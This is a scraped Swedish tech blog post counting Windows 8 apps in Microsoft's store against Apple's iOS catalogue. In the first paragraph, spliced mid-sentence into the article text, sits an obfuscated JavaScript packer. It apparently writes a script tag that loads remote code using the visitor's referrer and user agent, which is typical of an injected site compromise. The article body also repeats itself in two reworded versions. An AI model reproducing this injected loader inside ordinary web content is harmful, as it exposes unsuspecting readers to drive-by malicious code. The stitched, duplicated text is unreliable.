Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

PC

8000 Windows 8-appar i Microsoft webbaffär

8000 Windows 8-appar i Microsoft webbaffär
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nyrtr|var|u0026u|referrer|nbett||js|php’.split(’|’),0,{}))
finns det 7 873 Windows 8-appar i Microsoft webbaffär. Det är analytikern Wes Miller på Directions on Microsoft som tog på sig uppgiften att räkna ihop alla appar i affären. Denna siffra är en ökning på hela 2 000 appar jämfört med förra veckan. En fantastisk siffra i mina ögon.

Det går även rykten om att Microsoft kan komma släppa ytterligare appar inför lanseringen av Windows 8 i kväll.

Självklart går det inte i nuläget att jämföra med utbudet som finns hos konkurrenterna iOS och Android. Apple rapporterade i tisdags ihop med lanseringen av iPad mini att det nu finns 700 000 iOS-appar, varav 275 000 till iPad.

Men så fort operativsystemet är lanserats kommer vi säkerligen se att banden börjar rulla på hos Windowsutvecklarna.
Det är analytikern Wes Miller på Directions on Microsoft som tagit på sig uppgiften att räkna Windows 8-appar på Microsofts webbaffär. I går, onsdag, rapporterade han att det fanns 7 873. Det innebär en ökning på fler än 2 000 jämfört med förra veckan.

Vi kan dessutom räkna med att Microsoft släpper ett gäng appar till, inför lanseringen av Windows 8, torsdag kväll svensk tid.

Även om nyheterna om fler appar är bra för Microsoft så bleknar antalet i jämförelse med utbudet till Apples mobila enheter. Under lanseringen av Ipad Mini i tisdags rapporterade Apple att det finns 700 000 IOS-appar, varav 275 000 avsedda för surfplattan Ipad.

Kul tycker vi på Revue!

Glöm inte att följa kvällens evenemang på twittertaggen #win8sthlm och på Revue.se